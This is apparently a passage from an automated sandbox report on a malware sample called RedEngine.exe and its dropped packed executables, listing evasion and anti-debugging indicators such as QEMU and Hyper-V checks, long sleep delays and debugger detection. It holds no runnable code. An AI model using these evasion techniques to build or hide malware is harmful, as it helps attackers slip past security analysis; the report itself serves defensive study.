                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.0000000002962000.00000004.00000800.00020000.00000000.sdmp, mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.0000000002958000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.0000000002471000.00000004.00000800.00020000.00000000.sdmp, mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.0000000002962000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \QEMU-GA.EXE@\
                        Source: C:\Users\user\Desktop\RedEngine.exeMemory allocated: 2690000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeMemory allocated: 1A8C0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeMemory allocated: A50000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeMemory allocated: 2470000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeMemory allocated: B00000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\RedEngine.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6127Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3644Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5632Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4081Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeWindow / User API: threadDelayed 6141Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeWindow / User API: threadDelayed 3853Jump to behavior
                        Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 655
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2779
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2698
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 440
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4310
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4334
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1753
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60002\pyarmor_runtime_000000\pyarmor_runtime.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68282\pyarmor_runtime_000000\pyarmor_runtime.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60002\_lzma.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15482\_hashlib.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68282\_ssl.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15482\python312.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68282\select.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68282\_bz2.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68282\_socket.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60002\_tkinter.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15482\_ssl.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15482\unicodedata.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60002\_hashlib.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68282\_decimal.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68282\unicodedata.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15482\_socket.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60002\unicodedata.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60002\_bz2.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68282\python312.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60002\python312.dllJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15482\_lzma.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15482\_bz2.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68282\_ctypes.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15482\pyarmor_runtime_000000\pyarmor_runtime.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15482\_tkinter.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60002\select.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68282\_tkinter.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60002\_socket.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68282\_hashlib.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60002\_ctypes.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15482\_decimal.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15482\_ctypes.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI68282\_lzma.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60002\_ssl.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI60002\_decimal.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI15482\select.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_14-17107
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeAPI coverage: 5.2 %
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeAPI coverage: 2.4 %
                        Source: C:\Users\user\Desktop\RedEngine.exe TID: 7696Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956Thread sleep time: -10145709240540247s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8092Thread sleep time: -16602069666338586s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exe TID: 2980Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe TID: 5264Thread sleep count: 6141 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe TID: 5264Thread sleep time: -153525s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe TID: 5264Thread sleep count: 3853 > 30Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exe TID: 5264Thread sleep time: -96325s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3268Thread sleep count: 2779 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2156Thread sleep time: -4611686018427385s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1732Thread sleep count: 349 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3020Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1516Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8080Thread sleep count: 2698 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072Thread sleep count: 440 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4580Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2172Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 4036Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\svchost.exe TID: 2700Thread sleep time: -30000s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2936Thread sleep count: 4310 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5104Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2856Thread sleep count: 345 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4512Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6468Thread sleep count: 4334 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6468Thread sleep count: 1753 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752Thread sleep time: -4611686018427385s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeThread sleep count: Count: 6141 delay: -25Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeThread sleep count: Count: 3853 delay: -25Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BC85A0 FindFirstFileExW,FindClose,14_2_00007FF741BC85A0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BC79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,14_2_00007FF741BC79B0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BE0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,14_2_00007FF741BE0B84
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BC85A0 FindFirstFileExW,FindClose,31_2_00007FF741BC85A0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BC79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,31_2_00007FF741BC79B0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BE0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,31_2_00007FF741BE0B84
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795B985A0 FindFirstFileExW,FindClose,38_2_00007FF795B985A0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795B979B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,38_2_00007FF795B979B0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 38_2_00007FF795BB0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,38_2_00007FF795BB0B84
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795B985A0 FindFirstFileExW,FindClose,42_2_00007FF795B985A0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795B979B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,42_2_00007FF795B979B0
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FF795BB0B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,42_2_00007FF795BB0B84
                        Source: C:\Users\user\AppData\Roaming\CLPPTH\clppth.exeCode function: 42_2_00007FFB23B00220 GetSystemInfo,VirtualAlloc,42_2_00007FFB23B00220
                        Source: C:\Users\user\Desktop\RedEngine.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeFile opened: C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmpJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeFile opened: C:\Users\user\AppData\Local\Temp\E8C.tmpJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeFile opened: C:\Users\user\AppData\Local\Temp\E8C.tmp\E8D.tmp\E8E.tmpJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeFile opened: C:\Users\user~1\Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
                        Source: clppth.exe, 0000002A.00000002.3782245765.00000276FE3E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWv
                        Source: powershell.exe, 00000003.00000002.1682036119.000001D470662000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWR_IN%SystemRoot%\system32\mswsock.dllT_BE_ABANDONEDCIM_ERR_FILTERED_ENUMERATION_NOT_SUPPORTEDCIM_ERR_CONTINUATION_ON_ERROR_NOT_SUPPORTEDCIM_ERR_SERVER_LIMITS_EXCEEDEDCIM_ERR_SERVER_IS_SHUTTING_DOWNCIM_ERR_QUERY_FEATURE_NOT_SUPPORTEDDMTF ReservedValueMap
                        Source: clppth.exe, 0000002A.00000002.3785563967.00000276FEBD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: QhgfSERVER_KEY_EXCHANGE
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.0000000002962000.00000004.00000800.00020000.00000000.sdmp, mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.0000000002958000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe
                        Source: mgne4i3n.t1d2.exe, 0000001F.00000002.3779391365.0000019C7128F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3291813035.000001B21382B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3293854029.000001B218E42000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000023.00000002.3294028336.000001B218E55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                        Source: mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.0000000002471000.00000004.00000800.00020000.00000000.sdmp, mgne4i3n.t1d0.exe, 0000000B.00000002.1678511629.0000000002962000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \qemu-ga.exe@\
                        Source: powershell.exe, 0000001E.00000002.2185599790.00000190D0F4B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeCode function: 11_2_00A72CC0 CheckRemoteDebuggerPresent,11_2_00A72CC0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BD9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00007FF741BD9924
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeCode function: 13_2_0040A756 GetTempPathW,LoadLibraryW,GetProcAddress,GetLongPathNameW,FreeLibrary,13_2_0040A756
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BE2790 GetProcessHeap,14_2_00007FF741BE2790
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d0.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeCode function: 13_2_00409950 SetUnhandledExceptionFilter,13_2_00409950
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d1.exeCode function: 13_2_00409930 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,13_2_00409930
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BD9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00007FF741BD9924
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BCC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,14_2_00007FF741BCC44C
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BCBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00007FF741BCBBC0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 14_2_00007FF741BCC62C SetUnhandledExceptionFilter,14_2_00007FF741BCC62C
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_649413D0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,31_2_649413D0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BD9924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00007FF741BD9924
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BCC44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,31_2_00007FF741BCC44C
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BCBBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,31_2_00007FF741BCBBC0
                        Source: C:\Users\user\AppData\Roaming\mgne4i3n.t1d2.exeCode function: 31_2_00007FF741BCC62C SetUnhandledExceptionFilter,31_2_00007FF741BCC62C
